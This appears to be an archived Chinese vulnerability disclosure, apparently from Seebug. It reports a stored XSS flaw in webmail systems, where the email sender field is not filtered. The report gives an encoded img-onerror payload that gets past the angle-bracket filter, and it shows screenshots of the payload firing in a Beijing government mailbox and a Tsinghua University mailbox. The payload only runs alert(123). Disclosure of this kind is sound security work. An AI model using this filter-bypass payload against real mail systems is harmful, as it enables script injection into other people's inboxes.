### 简要描述:
邮件发信人处未过滤特殊字符
### 详细说明:
```
]));123"' /span><=\u003c\u003e;<img src=x onerror='alert(123)'/>\u003c\u003e=>x@x.gov.cn
```
x@x.gov.cn 是真正发信邮箱,前面的代码已经经过编码过了。虽然开发将<>标签过滤了,但是还是有办法让“<”这个标签存在。
### 漏洞证明:
北京市公务员邮箱:
[<img src="https://images.seebug.org/upload/201508/13232447298d38adf9fa3d13125db94b7c4f13d6.jpg" alt="12.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/13232447298d38adf9fa3d13125db94b7c4f13d6.jpg)
清华大学邮箱:
[<img src="https://images.seebug.org/upload/201508/13232457d3b5f511ca4d2682c42f29c93cda86be.jpg" alt="222.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/13232457d3b5f511ca4d2682c42f29c93cda86be.jpg)
京公网安备 11010502034610号
暂无评论